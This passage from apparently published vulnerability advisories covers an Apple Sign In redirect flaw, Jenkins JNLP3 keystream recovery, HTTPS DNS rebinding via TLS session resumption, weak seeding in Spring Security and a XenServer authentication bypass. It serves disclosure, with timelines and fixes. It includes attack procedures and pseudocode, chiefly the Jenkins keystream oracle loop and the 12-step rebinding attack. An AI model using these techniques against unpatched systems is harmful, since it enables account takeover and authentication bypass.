  • A user visiting a page on any subdomain over HTTP. The important subdomains will have an HSTS header, but many will not. The apple.com domain is not HSTS preloaded with includeSubdomains.

The first two require the attacker to trick users into visiting the malicious page. The third requires that the attacker has access to the user's local network. While such an attack is in general harder, it does allow a very interesting scenario: when an Apple device connects to a wifi network, it tries to access a fixed URL on captive.apple.com. If the response does not match the usual response, then the system assumes there is a captive portal where the user will need to do something first. To allow the user to do that, the response page is opened and shown. Usually, this redirects the user to another page where they need to log in, accept terms and conditions, pay, etc. However, it does not need to do that. Instead, the page could embed JavaScript which triggers the TouchID login, which will be allowed as it is on an apple.com subdomain. If the user authenticates, then the malicious JavaScript receives the user's grant_code.

The page could include all sorts of content to make the user more likely to authenticate, for example by making the page look like it is part of iOS itself, or like a “Sign in with Apple” button. “Sign in with Apple” is still pretty new, so users might not notice that the prompt is slightly different than usual. Besides, many users will probably authenticate automatically when they see a TouchID prompt, as those prompts are almost always about authenticating to the phone itself; the fact that users should also consider whether they want to authenticate to the page which opened the prompt is not made obvious.

By setting up a fake hotspot in a location where users expect to receive a captive portal (for example at an airport, hotel or train station), it would have been possible to gain access to a significant number of iCloud accounts, which would have allowed access to backups of pictures, location of the phone, files and much more. As we mentioned, this also bypasses the normal 2FA approve + 6-digit code step.

We reported this vulnerability to Apple, and they fixed it the same day they triaged it. The API now correctly checks that the redirect_uri matches the client_id. Therefore, this could be fixed entirely server-side.

It makes a lot of sense to us how this vulnerability could have been missed: people testing this will probably have focused on using untrusted domains for the redirect_uri, for example domains that merely contain or resemble the expected domain. In this case those attempts fail; by trying just those, however, you would miss the ability to use a malicious subdomain.
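
To make the difference between the two checks concrete, here is a hypothetical model of the validation in Python (all client IDs and URIs are made up for illustration):

# Hypothetical model; client IDs and URIs are illustrative.
from urllib.parse import urlparse

REGISTERED_REDIRECTS = {
    "icloud-web-client": {"https://www.icloud.com"},
}

def check_per_client(client_id: str, redirect_uri: str) -> bool:
    # The check the API should perform (and performs after the fix):
    # the redirect URI must be one registered for this specific client.
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, set())

def check_suffix_whitelist(redirect_uri: str) -> bool:
    # The check that was effectively applied: any subdomain of a few
    # trusted domains is accepted, regardless of the client_id.
    host = urlparse(redirect_uri).hostname or ""
    return any(host == d or host.endswith("." + d)
               for d in ("apple.com", "icloud.com", "icloud.com.cn"))

# check_suffix_whitelist("https://anything.apple.com/x") -> True,
# which is what made every apple.com subdomain a viable attack surface.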

The video below illustrates the vulnerability.

Jenkins - authentication bypass

30 January 2020 at 00:00

During a short review of the Jenkins source code, we found a vulnerability that can be used to bypass the mutual authentication when using the JNLP3 remoting protocol. In particular, this allows anyone to impersonate a client and thereby gain access to the information and functionality that should only be available to that client.

Technical Background

Jenkins supports 4 different versions of the remoting protocol. Versions 1 and 2 are unencrypted, version 3 uses a custom handshake protocol and version 4 is secured using TLS. The vulnerability exists only in version 3.

Versions 1, 2 and 3 are deprecated, and warnings are shown when they are enabled. However, these warnings and the documentation only mention a stability impact, not a security impact such as a lack of authentication.

As described in the documentation in the code, the JNLP3 handshake works as follows:


Client                                                                Master
          handshake ciphers = createFrom(agent name, agent secret)
  |                                                                     |
  |      initiate(agent name, encrypt(challenge), encrypt(cookie))      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                         encrypt(challenge)                          |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          encrypt(cookie)                            |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                  encrypt(AES key) + encrypt(IvSpec)                 |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
             channel ciphers = createFrom(AES key, IvSpec)
          channel = channelBuilder.createWith(channel ciphers)

The encrypt function in this diagram uses keys that are derived from the client name and client secret. The exact procedure createFrom is not important for this issue, just that the keys only depend on the client name and secret and are therefore constant for all connections between that client and the master:


The encryption algorithm used is AES/CTR/PKCS5Padding:



As is commonly known, CTR mode must never be reused with the same keys and counter (IV): the encrypted value is generated by bytewise XORing a keystream with the plaintext data. When two different messages are encrypted using the same key and counter, the XOR of the two ciphertexts gives the XOR of the plaintexts as the keystream is canceled out. If one plaintext is known, this makes it possible to determine the keystream and the data in the second plaintext.
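
This property is easy to demonstrate (a self-contained Python sketch, with os.urandom standing in for the AES-CTR keystream):

# XOR of two ciphertexts under the same keystream equals XOR of plaintexts.
import os

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

keystream = os.urandom(16)
p1, p2 = b"known plaintext!", b"secret plaintext"
c1, c2 = xor(p1, keystream), xor(p2, keystream)

assert xor(c1, c2) == xor(p1, p2)   # the keystream cancels out
assert xor(xor(c1, p1), c2) == p2   # knowing p1 reveals p2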

Each call to encrypt in the diagram above restarts the cipher, therefore, even when performing the handshake just once the keystream is reused multiple times.

Knowing the first ~2080 bytes of the AES-CTR keystream is enough to impersonate a client: the client needs to be able to decrypt the server's challenge, which is around 2080 bytes, and all other packets are smaller than that.


There are a number of ways to trick the server into encrypting a known plaintext, which allows an attacker to recover a part of the keystream, which can then be used to decrypt other packets. We describe a relatively efficient approach below, but many different (possibly more efficient) approaches are likely to exist.

The client can send an initiate packet with the challenge as an empty string. This means that the response from the server will always be the encryption of the SHA-256 hash of the empty string. This allows the attacker to decrypt the initial bytes of the keystream.

Then, the attacker can obtain the rest of the keystream byte by byte in the following way: The attacker encrypts a message that is exactly as long as the keystream the attacker currently knows and appends one extra byte. The server will respond with one of 256 possible hashes, depending on how the extra byte was decrypted by the server. The attacker can decrypt the hash (because a large enough prefix is already known from the previous step) and determine which byte the server had used, which can be XORed with the ciphertext byte to obtain the next keystream byte.
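
In pseudocode, the recovery loop looks roughly as follows. The helpers send_initiate, decrypt_reply and recover_prefix_from_empty_challenge are hypothetical stand-ins for the real protocol code, and xor is the helper from the sketch above:

# Sketch of the byte-by-byte keystream extension.
import hashlib

known = recover_prefix_from_empty_challenge()   # via the SHA-256("") response

while len(known) < 2080:
    n = len(known)
    for trailing_byte in range(256):
        # A challenge that decrypts to n known bytes plus one unknown byte.
        ciphertext = xor(b"A" * n, known) + bytes([trailing_byte])
        reply_hash = decrypt_reply(send_initiate(ciphertext), known)
        for value in range(256):
            if hashlib.sha256(b"A" * n + bytes([value])).digest() == reply_hash:
                known += bytes([trailing_byte ^ value])   # next keystream byte
                break
        else:
            continue   # no matching hash; try a different trailing byte
        break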

There is one complication to this approach: in many places in the handshake binary data is for some unknown reason interpreted as ISO-8859-1 and converted to UTF8 or vice versa. This means that when the decrypted challenge ends in a character that is a partial UTF-8 multibyte sequence, the character is ignored. In that case, it is not possible to determine which character the server had decrypted. By trying at most 3 different bytes, it is possible to find one that is valid.

We have developed a proof-of-concept of this attack. Using this, we were able to retrieve enough bytes of the keystream to pass authentication with about 3000 connections to Jenkins, which took around 5 minutes against a local server. As mentioned, it is likely that this can be reduced even further.

It is also possible to perform a similar attack to impersonate a master against a client, if the connection can be intercepted and the client automatically reconnects. We did not spend time on developing this.


It is not possible to prevent this attack in a way that is backwards compatible with existing JNLP3 clients and masters. Therefore, we recommend removing support for JNLP3 completely. Arguably, JNLP1 and JNLP2 protocols are safer to use as those can only be taken over if a connection is intercepted. A safer encrypted alternative already exists (JNLP4), so investing time in fixing this protocol would not be needed.


We reported the issue to the Jenkins team, who coincidentally were already considering removing support for the version 1, 2 and 3 remoting protocols as they are deprecated and were known to have stability impact. These protocols have now been removed in Jenkins 2.219. In version 2.204.2 of the LTS releases of Jenkins, this protocol can still be enabled by setting a configuration flag, but this is strongly discouraged.

Users using an older version of Jenkins can mitigate this issue by not enabling version 3 of the remoting protocol.


Timeline

2019-12-06 Issue reported to Jenkins as SECURITY-1682.
2019-12-06 Issue acknowledged by the Jenkins team.
2020-01-16 Fix prepared.
2020-01-29 Advisory published by Jenkins.
2020-01-30 This advisory published by Computest.

DNS rebinding for HTTPS

25 November 2019 at 00:00

A DNS rebinding attack is possible against a server that uses HTTPS by abusing TLS session resumption in a specific way.

In addition, the implementation of the Extended Master Secret extension in SChannel contained a vulnerability that made it ineffective.

Technical background

A DNS rebinding attack works as follows: an attacker A waits for a user C to visit the attacker’s website, say attacker.example. The DNS record for attacker.example initially points to an IP address of the attacker with a low TTL. Once the page is loaded, JavaScript repeatedly attempts to communicate back to attacker.example using the XMLHttpRequest API. As this is in the same origin, the attacker can influence almost everything about the request and can read almost every part of the response.

The attacker then updates this DNS record to point to a different server (not owned by A) instead. This means that the requests intended for attacker.example end up at a different server after the record expires, say, server.example owned by S. If this server does not check the HTTP Host header of the request, then it may accept and process it.

The proper way to prevent this attack is to ensure that web servers verify that the Host header on every request matches a host that is in use by that server. Another workaround that is commonly recommended is to use HTTPS, as the attack as described does not work with HTTPS: when the DNS record is updated and C connects to server.example, C will notice that the server does not present a valid certificate for attacker.example, therefore the connection will be aborted.

The most interesting scenarios for this attack involve attacking a device on the network (or even on the local machine) of C. This is due to a number of reasons, one of which is the problems with HTTPS.


It is possible to perform a DNS rebinding attack against an HTTPS server by abusing TLS session resumption in a specific way. Contrary to the “normal” DNS rebinding attack, A needs to be able to communicate with S to establish a session that C will later resume. This attack is similar to the Triple-Handshake Attack (3SHAKE); however, the measures that were taken by TLS implementations in response to that attack do not adequately defend against this attack.

Just like in the 3SHAKE attack, A can set up two connections C -> A and A -> S that have the same encryption keys and then pass the session ID or session ticket from S on to C. This is known as an “Unknown Key-Share Attack”. Contrary to the 3SHAKE attack, however, A can update the DNS record for attacker.example before the session is resumed. TLS resumption does not re-transmit the certificate of the server, both endpoints will assume that the certificate is still the same as for the previous connection. Therefore, when C resumes the connection at S, C assumes it has an encrypted connection authenticated by attacker.example, while S assumes it has sent the certificate for server.example on this connection.

To any web applications running on S, the connection will appear to be originating from C’s IP address. If the website on server.example has functionality that is IP restricted to only be available to C, then A will be able to interact with this functionality on behalf of C.

In more detail:

  1. C opens a connection to A, using client random r1 in the ClientHello message.

  2. A opens a connection to S, using the same client random r1. A advertises only the ciphers C included that use RSA key exchange and A does not advertise the “extended master secret” TLS extension.

  3. S replies to A with server random r2 and session ID s in the ServerHello message.

  4. A replies to C with server random r2 and session ID s and the same cipher suite as chosen for the other connection, but A’s own certificate. A makes sure that the extended master secret extension is not enabled here either.

  5. C sends an encrypted pre-master secret to A. A decrypts this value using the private RSA key corresponding to A’s certificate to obtain its value, p.

  6. A also sends p in a ClientKeyExchange to S, now encrypted with the public key of S.

  7. Both connections finish. The master secret for both is derived only from r1, r2 and p (see the PRF sketch after this list). Therefore, they are identical. A knows this master secret, so it can cleanly finish both handshakes and exchange data on both connections.

  8. A sends a page containing JavaScript to C.

  9. A updates the DNS record for attacker.example to point to S’s IP address instead.

  10. A closes the connections with C and S.

  11. Due to an XHR request from A’s JavaScript, C will reconnect. It receives the new DNS record, therefore it resumes the connection at S, which will work as it recognises the session ID and the keys match. As it is a resumption, the certificate message is skipped.

  12. JavaScript from A can now send HTTP requests to S within the origin of attacker.example.
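
To see why step 7 holds, consider the TLS 1.2 key derivation (RFC 5246). A minimal sketch of the PRF:

# TLS 1.2 PRF (RFC 5246, P_SHA256). Without EMS, the master secret depends
# only on the pre-master secret p and the randoms r1 and r2, so both
# connections in steps 1-7 derive the identical, attacker-known key.
import hmac, hashlib

def p_sha256(secret: bytes, seed: bytes, length: int) -> bytes:
    out, a = b"", seed
    while len(out) < length:
        a = hmac.new(secret, a, hashlib.sha256).digest()
        out += hmac.new(secret, a + seed, hashlib.sha256).digest()
    return out[:length]

def master_secret(p: bytes, r1: bytes, r2: bytes) -> bytes:
    return p_sha256(p, b"master secret" + r1 + r2, 48)

With the extended master secret extension, the seed b"master secret" + r1 + r2 is replaced by a label plus the session hash, which covers all handshake messages up to that point, including the certificate; this is exactly what makes the unknown key-share construction above impossible.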

Cipher selection

A can force the use of a specific cipher suite on the first two connections, assuming both C and S support it. It can indicate support for only the desired cipher suite(s) on the connection A -> S and then select the same cipher suite on the C -> A connection.

When a session is resumed, the same cipher suite is used as for the original connection. Because A removed certain cipher suites, the ClientHello that is used for resumption will almost certainly indicate stronger ciphers than the cipher the original connection used. A server could detect this and decide to perform a full handshake instead, because that way a stronger cipher suite would be used. Few servers appear to actually do this.

Extended master secret

In response to the 3SHAKE attack, the extended master secret (EMS) extension was added to TLS in RFC 7627. This extension appears to be implemented by most browsers, however, support on servers is still limited. This extension would make the Unknown Key-Share attack impossible, as the full contents of the initial handshake messages (including the certificates) are included in the master secret computation, not just the random values.

The attack is impossible if both client and server support EMS and enforce its usage. However, as server support is limited (browser) clients currently do not require it.

When the extension is not required but supported by both the client and the server, it could be used to detect the above attack and refuse resumption (making the attack impossible as well). If the server receives a ClientHello that indicates support for EMS and which attempts to resume a session that did not use EMS, it must refuse to resume it and perform a full handshake instead.

This is described in RFC 7627 as follows:

 o  If the original session did not use the "extended_master_secret"
    extension but the new ClientHello contains the extension, then the
    server MUST NOT perform the abbreviated handshake.  Instead, it
    SHOULD continue with a full handshake (as described in
    Section 5.2) to negotiate a new session.

This is, however, not universally followed by servers. Most notably, we found that IIS indicates support for EMS in the full-handshake ServerHello, but when it receives a ClientHello that indicates support for EMS and requests resumption of a session that did not use EMS, IIS allows the session to be resumed. We also found that servers hosted by the Fastly CDN were vulnerable in the same way.

The attack also works when the server does not support EMS, but the client does. The Interoperability Considerations in §5.4 of RFC 7627 only say the following about that:

 If a client or server chooses to continue an abbreviated handshake to
 resume a session that does not use the extended master secret, then
 the current connection becomes vulnerable to a man-in-the-middle
 handshake log synchronisation attack as described in Section 1.
 Hence, the client or server MUST NOT use the current handshake's
 "verify_data" for application-level authentication.  In particular,
 the client MUST disable renegotiation and any use of the "tls-unique"
 channel binding [RFC5929] on the current connection.

This section only highlights risks for renegotiation and channel binding on this connection. The ability to perform a DNS rebinding attack does not seem to have been considered here. To address that risk, the only option is to not resume connections for which EMS was not used and for which the remote IP address has changed.

Other configurations

The sequence of handshake messages is different when session tickets are used instead of ID-based resumption, but the attack still works in pretty much the same way.

While the example above used the RSA key exchange, as noted in the 3SHAKE research the DHE or ECDHE key exchanges are also affected if the client accepts arbitrary DHE groups or ECDHE curves and does not verify that these are secure. Support for DHE has been removed in all common browsers (except Firefox), and arbitrary ECDHE curves appear never to have been supported in browsers. When using Curve25519, certain “non-contributory” points can be used to force a specific shared secret; the TLS implementations we looked at correctly reject those points.

TLS 1.3 is not affected, as in that version the EMS extension is incorporated into the design.

SNI also influences the process. On the initial connection, the attacker can pick the name that is indicated via SNI. While a large portion of webservers is configured to reject unknown Host headers, almost no HTTPS servers were found that reject the handshake when an unknown SNI name is received; servers most often reply with a certain “default” certificate. We found that some servers require the SNI name for a resumption to be equal to the SNI name of the original connection. If this is not the case, then it may be possible to change the selected virtual host based on the SNI name of the first connection, though we did not find a server configured like this in practice.

It may also be possible for A to send a client certificate to S on the first connection, and then attribute the messages sent after the resumption to A’s identity. We did not find a concrete attack that would be possible using this, but for other protocols that rely on TLS it may be an issue.

The attack as described relies on A updating their DNS record. Even with a minimal TTL, this may require a long time for all caches to obtain the updated record. This is not required for the attack: A can include two IP addresses in the A/AAAA record, the first being A's own address, the second the address of the victim server. Once A has delivered the JavaScript and session ID/ticket, A can reject connections from the user (by sending a TCP RST response), which means the browser will fall back to the second IP address, therefore connecting to S instead.


We wrote a tool to accept TLS connections and perform the attack by establishing a connection to a remote server with the same master secret and forwarding the session ID. By subsequently refusing connections, it was possible to cause browsers to resume their sessions at the remote server instead.

We have performed this attack successfully against the following browsers:

  • Safari 12.1.1 on macOS 10.14.5.
  • Chrome 74.0.3729.169 on macOS 10.14.5.
  • Safari on iOS 12.3.
  • Microsoft Edge 44.17763.1.0 on Windows 10.
  • Chrome 74.0.3729.169 on Windows 10.
  • Internet Explorer 11 on Windows 7.
  • Chrome 74.0.3729.61 on Android 10.

As mentioned, we also found the following server vulnerable to allowing a resumption of a non-EMS connection using an EMS ClientHello:

  • IIS 10.0.17763.1 on Windows 10.

Firefox is (currently) not vulnerable, as its TLS session storage separates sessions by remote IP address and will not attempt to resume if the IP address has changed.


To summarise, this vulnerability can be used by an attacker to bypass IP restrictions on a web application, provided that the web server:

  • supports TLS session resumption;
  • does not support the EMS TLS extension (or does not enforce it, like IIS);
  • can be connected to by an attacker;
  • does not verify the Host header on requests or the targeted web application is the fallback virtual host;
  • has functionality that is restricted based on IP address.

As it cannot be determined automatically whether a website has functionality that is IP restricted, we could not determine the exact scale of vulnerable websites. Based on a scan of the top 1M most popular websites, we estimate that about 30% of webservers fulfil the first 2 requirements.


Chrome 77 will not allow TLS sessions to be resumed if the RSA key exchange is used and the remote IP address has changed.

SChannel (IE/Edge) in update KB4520003 will not allow TLS sessions to be resumed if EMS was not used. In addition, the EMS implementation on the server side was fixed to no longer allow non-EMS sessions to be resumed using an EMS handshake.

Safari in macOS Catalina (10.15) will not allow TLS sessions to be resumed if the remote IP address has changed.

Fastly has fixed their TLS implementation to also not allow non-EMS sessions to be resumed using an EMS-handshake.

Due to these changes, servers may notice a decrease in the percentage of sessions that are successfully resumed. In order to maximise the chance of successful resumption, servers should make sure that:

  • Cipher suites using RSA key exchange are only used if ECDHE is not supported by the client.
  • The Extended Master Secret extension is supported and enabled by the server.
  • Clients connect to the same server IP address as much as possible, for example by ensuring the TTL of DNS responses is high if multiple IP addresses are used.

When using TLS 1.3, the RSA key exchange is no longer allowed and Extended Master Secret has become part of the design instead of an extension. Therefore, the first two recommendations are no longer needed.


Timeline

2019-06-03 Report sent to Google, Apple, Microsoft.
2019-07-01 Fix committed for Chromium.
2019-07-15 EMS problem reported to Fastly.
2019-07-30 Fix by Fastly deployed and confirmed.
2019-09-11 Chrome 77 released with the fix.
2019-10-07 macOS Catalina released with the fix.
2019-10-08 Update KB4520003 released by Microsoft with the fix.

Spring Security - insufficient cryptographic randomness

4 July 2019 at 00:00

The SecureRandomFactoryBean class in Spring Security by Pivotal has a vulnerability in certain versions that could lead to the generation of predictable random values when a custom seed is supplied. This contradicted the documentation, which states that adding a custom seed does not decrease the entropy. The cause of this bug is incorrect use of the Java SecureRandom API. This vulnerability could lead to predictable keys or tokens in applications that depend on cryptographically secure randomness. It was fixed by Pivotal by ensuring that the proper seeding always takes place.

Applications that use this class may need to evaluate if any predictable tokens were generated that should be revoked.

Technical Background

The SecureRandom class in Java offers a cryptographically secure pseudo-random number generator. It is often the best method in Java for generating keys, tokens or nonces for which unpredictability is critical. When using this class multiple algorithms may be available. An explicit algorithm can be selected by calling (for example) SecureRandom.getInstance("SHA1PRNG"). The seeding of an instance generated this way happens as soon as the first bytes are requested, not during creation.

Normally, when calling setSeed() on a SecureRandom instance, the seed is incorporated into the state, to supplement its randomness. However, when calling setSeed() on an instance newly created with an explicit algorithm, there is no state yet; therefore the seed will set the entire state, and no other entropy is used.

This is mentioned in the documentation for SecureRandom.getInstance():

The returned SecureRandom object has not been seeded. To seed the returned
object, call the setSeed method. If setSeed is not called, the first call to
nextBytes will force the SecureRandom object to seed itself. This self-
seeding will not occur if setSeed was previously called.

This text is misleading, as the first two sentences may give the impression that the instance could be unsafe to use without seeding, while the self-seeding will in fact be much safer than supplying the seed for almost all applications.
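
The difference between the two behaviours can be illustrated with a toy model (this is not the actual SHA1PRNG implementation, just the same seeding semantics):

# Toy model: seeding an unseeded instance REPLACES the state; seeding after
# first use only supplements it.
import hashlib, os

class ToyPRNG:
    def __init__(self):
        self.state = None                      # created unseeded

    def set_seed(self, seed: bytes):
        if self.state is None:
            self.state = seed                  # becomes fully deterministic
        else:
            self.state = hashlib.sha1(self.state + seed).digest()  # mixed in

    def next_bytes(self, n: int) -> bytes:
        if self.state is None:
            self.state = os.urandom(20)        # self-seeding on first use
        out = b""
        while len(out) < n:
            self.state = hashlib.sha1(self.state).digest()
            out += self.state
        return out[:n]

# Two instances seeded with the same bytes before first use produce the
# exact same "random" stream:
a, b = ToyPRNG(), ToyPRNG()
a.set_seed(b"password"); b.set_seed(b"password")
assert a.next_bytes(16) == b.next_bytes(16)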

This is a well-known flaw in the design that can lead to incorrect use, and it has been discussed before:

You should never call setSeed before retrieving data from the "SHA1PRNG" in
the SUN provider as that will make your RNG (Random Number Generator) into a
Deterministic RNG - it will only use the given seed instead of adding the
seed to the state. In other words, it will always generate the same stream
of pseudo random bits or values.

Google noticed that on Android some apps depend on this unexpected usage, which made it difficult to change the behaviour.

A common but incorrect usage of this provider was to derive keys for
encryption by using a password as a seed. The implementation of SHA1PRNG had
a bug that made it deterministic if setSeed() was called before obtaining
output.


The SecureRandomFactoryBean class in spring-security returns a SecureRandom object with SHA1PRNG as the explicitly selected algorithm. It is optionally possible to set a Resource as a seed:


public SecureRandom getObject() throws Exception {
    SecureRandom rnd = SecureRandom.getInstance(algorithm);

    if (seed != null) {
        // Seed specified, so use it
        byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());
        rnd.setSeed(seedBytes);
    }
    else {
        // Request the next bytes, thus eagerly incurring the expense of default
        // seeding
        rnd.nextBytes(new byte[1]);
    }

    return rnd;
}

The documentation of SecureRandomFactoryBean.setSeed() states (contradictory to the documentation of SecureRandom itself):

Allows the user to specify a resource which will act as a seed for the
SecureRandom instance. Specifically, the resource will be read into an
InputStream and those bytes presented to the SecureRandom.setSeed(byte[])
method. Note that this will simply supplement, rather than replace, the
existing seed. As such, it is always safe to set a seed using this method
(it never reduces randomness).

When used with a seed this means that a SecureRandom instance is generated in the vulnerable way as described above. In other words, the Resource entirely determines all output of this PRNG. If two different objects are created with the same seed then they will return identical output. The note in the documentation stating that it supplements the seed and can not reduce randomness was therefore false.

The fix

The easiest way to prevent this vulnerability would be to request the first byte before calling setSeed(), even if a seed is set:

SecureRandom rnd = SecureRandom.getInstance(algorithm);

// Request the first byte, thus eagerly incurring the expense of default
// seeding and to prevent the seed from replacing the entire state.
rnd.nextBytes(new byte[1]);

if (seed != null) {
    // Seed specified, so use it to supplement the self-seeded state
    byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());
    rnd.setSeed(seedBytes);
}

return rnd;
This, however, requires that no application depends on the current possibility of using SecureRandom fully deterministically.

Mitigation

Applications that use SecureRandomFactoryBean with a vulnerable version of Spring Security can mitigate this issue by not providing a seed with setSeed(), or by ensuring that the seed itself has sufficient entropy.
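If a seed has to be supplied, it should be generated once from a cryptographically strong source so that, even though it replaces the PRNG state entirely, the resulting output remains unpredictable. A minimal sketch (the file name is just an example):

import java.io.FileOutputStream;
import java.security.SecureRandom;

public class GenerateSeedFile {
    public static void main(String[] args) throws Exception {
        // Draw the seed from the platform's strongest entropy source, so that
        // even if it ends up replacing the PRNG state it stays unpredictable.
        byte[] seed = SecureRandom.getInstanceStrong().generateSeed(32);
        try (FileOutputStream out = new FileOutputStream("securerandom.seed")) {
            out.write(seed);
        }
    }
}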

Conclusion

Pivotal responded quickly and fixed the issue in the recommended way in Spring Security. However, depending on the applications that use this library, keys or tokens which were generated using insufficient randomness may still exist and be in use. Applications that use SecureRandomFactoryBean should investigate if this may be the case and if any keys or tokens need to be revoked.

Applications that rely on using SecureRandomFactoryBean to generate deterministic sequences will no longer work and should switch to a proper key-derivation function.
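For example, code that (ab)used a seeded SecureRandom to turn a password into key material can derive the same kind of reproducible output from the PBKDF2 implementation that ships with the JDK. A minimal sketch (iteration count and output size are illustrative):

import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

public class DeriveKey {
    // Derives 32 bytes (256 bits) of key material from a password and salt.
    // Unlike seeding a PRNG, the salt and iteration count make brute-forcing
    // the input secret much more expensive.
    static byte[] deriveKey(char[] password, byte[] salt) throws Exception {
        PBEKeySpec spec = new PBEKeySpec(password, salt, 200_000, 256);
        SecretKeyFactory kdf = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256");
        return kdf.generateSecret(spec).getEncoded();
    }
}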

Timeline

2019-03-08 Report sent to Pivotal's security contact.
2019-03-09 Reply from Pivotal that they confirmed the issue and are working on a fix.
2019-03-18 Fixed by Pivotal in revision 9c1eac79e2abb50f7b01e77c2418566f2a30532f.
2019-04-02 Vulnerability report published by Pivotal.
2019-04-03 Spring Security 5.1.5, 5.0.12, 4.2.12 released with the fix.
2019-07-04 Advisory published by Computest.

XenServer - path traversal leading to authentication bypass

14 August 2018 at 00:00

During a brief code review of XenServer, Computest found and exploited a vulnerability in the XAPI management service that allows an attacker to bypass authentication and remotely perform arbitrary XAPI calls with administrative privileges.

This vulnerability can be further exploited to execute arbitrary shell commands as the operating system “root” user on the Dom0 virtual machine. The Dom0 is the component that manages the hypervisor, and has full control over all the virtual machines as well as the network and storage resources attached to the system.

To exploit this vulnerability, an attacker has to be on a network that can reach one of the IPs and ports the XAPI service is available on (ports 80 and 443 by default). Alternatively, the attack can be performed through the browser of a user who has access to this port, either via a DNS rebinding attack or possibly via a cross-site scripting attack that uses the primary vulnerability to read a logfile containing attacker-controlled HTML.

This was not a full audit and further issues may or may not be present.

About XenServer and XAPI

About XenServer:

XenServer is the leading open source virtualization platform, powered by the Xen Project hypervisor and the XAPI toolstack. It is used in the world’s largest clouds and enterprises.

Technical support for XenServer is available from Citrix.


About XAPI:

The Xen Project Management API (XAPI) is:

  • A Xen Project Toolstack that exposes the XAPI interface. When we refer to XAPI as a toolstack, we typically include all dependencies and components that are needed for XAPI to operate (e.g. xenopsd).
  • An interface for remotely configuring and controlling virtualised guests running on a Xen-enabled host. XAPI is the core component of XenServer and XCP.


While XAPI is maintained by the Xen project, it is not a required component of all Xen-based systems. It is required in XenServer.

Technical Background

Virtual machines have become the platform of choice for nearly all new IT infrastructure because of the massive benefits in manageability and resource optimization. However, a virtual machine can only be as secure as the platform it runs on.

For this reason compromising a hypervisor is always a high priority target, both during penetration tests and for real attackers.

The XAPI toolstack provides an API interface that is used both for communication between nodes in the same pool and for managing the pool, for example using a desktop application such as XenCenter. It is also the backend used by command line tools such as ‘xe’ and can be used by management platforms such as OpenStack, CloudStack, and Xen Orchestra.

Availability of the XAPI port, and vulnerability to DNS rebinding

While Citrix recommends keeping management traffic separate from storage traffic and VM traffic, in practice the system is often not configured this way. By default, the XAPI service appears to listen on every IP assigned to the hypervisor (more precisely, the Dom0). If no external interface is selected as a management interface, the XAPI service may still be accessible through one or more host internal management networks, which can be made available to VMs.

The XAPI service is available both over unencrypted HTTP on port 80 and over HTTPS on port 443 (with a self-signed certificate by default).

The service does not check the HTTP Host header specified in requests, which makes the service vulnerable to DNS rebinding attacks. Using a DNS rebinding attack a remote attacker can reach a XAPI service on the internal network by convincing a user on the internal network to visit a malicious website, without needing to exploit any vulnerability in the web browser or client OS.
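A generic defence against DNS rebinding is to reject requests whose Host header does not match a name or address the service is meant to be reachable on, since a rebinding attack necessarily arrives with the attacker's hostname in that header. A minimal sketch of such a check (in Java for consistency with the earlier examples; the allowed values are hypothetical):

import java.util.Set;

public class HostHeaderCheck {
    // Names and addresses the management interface is expected to be
    // reached on; these values are examples only.
    private static final Set<String> ALLOWED =
            Set.of("xenserver.internal.example", "10.0.0.2");

    // Returns true if the Host header (optionally including a port)
    // matches one of the expected values.
    static boolean hostAllowed(String hostHeader) {
        if (hostHeader == null) return false;
        String host = hostHeader.split(":", 2)[0].toLowerCase();
        return ALLOWED.contains(host);
    }
}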

Either way, because of the importance of a hypervisor it still needs to be able to defend against attackers who have already gained access to internal networks.

Authentication and request handling in XAPI

In assessing the XAPI we started by identifying the parts of the code where authentication checks are performed. All code is available on GitHub.

The first thing to note is that API endpoints are registered using add_handler in the file /ocaml/xapi/

let add_handler (name, handler) =

let action =
  try List.assoc name Datamodel.http_actions
  with Not_found ->
    (* This should only affect developers: *)
    error "HTTP handler %s not registered in ocaml/idl/" name;
    failwith (Printf.sprintf "Unregistered HTTP handler: %s" name) in
let check_rbac = Rbac.is_rbac_enabled_for_http_action name in

let h = match handler with
  | Http_svr.BufIO callback ->
    Http_svr.BufIO (fun req ic context ->
           if check_rbac
           then (* rbac checks *)
             (try
                assert_credentials_ok name req ~fn:(fun () -> callback req ic context) (Buf_io.fd_of ic)
              with e ->
                debug "Leaving RBAC-handler in xapi_http after: %s" (ExnHelper.string_of_exn e);
                raise e)
           else (* no rbac checks *)
             callback req ic context)

So in short: if Rbac.is_rbac_enabled_for_http_action returns false for an endpoint, no authentication is performed. Otherwise assert_credentials_ok is called, which will throw an exception if the request is not authorized.

Looking into is_rbac_enabled_for_http_action a bit more, the following endpoints are exempted from authentication:

(* these public http actions will NOT be checked by RBAC *)
(* they are meant to be used in exceptional cases where RBAC is already *)
(* checked inside them, such as in the XMLRPC (API) calls *)
let public_http_actions_with_no_rbac_check =
  [ "post_root"; (* XMLRPC (API) calls -> checks RBAC internally *)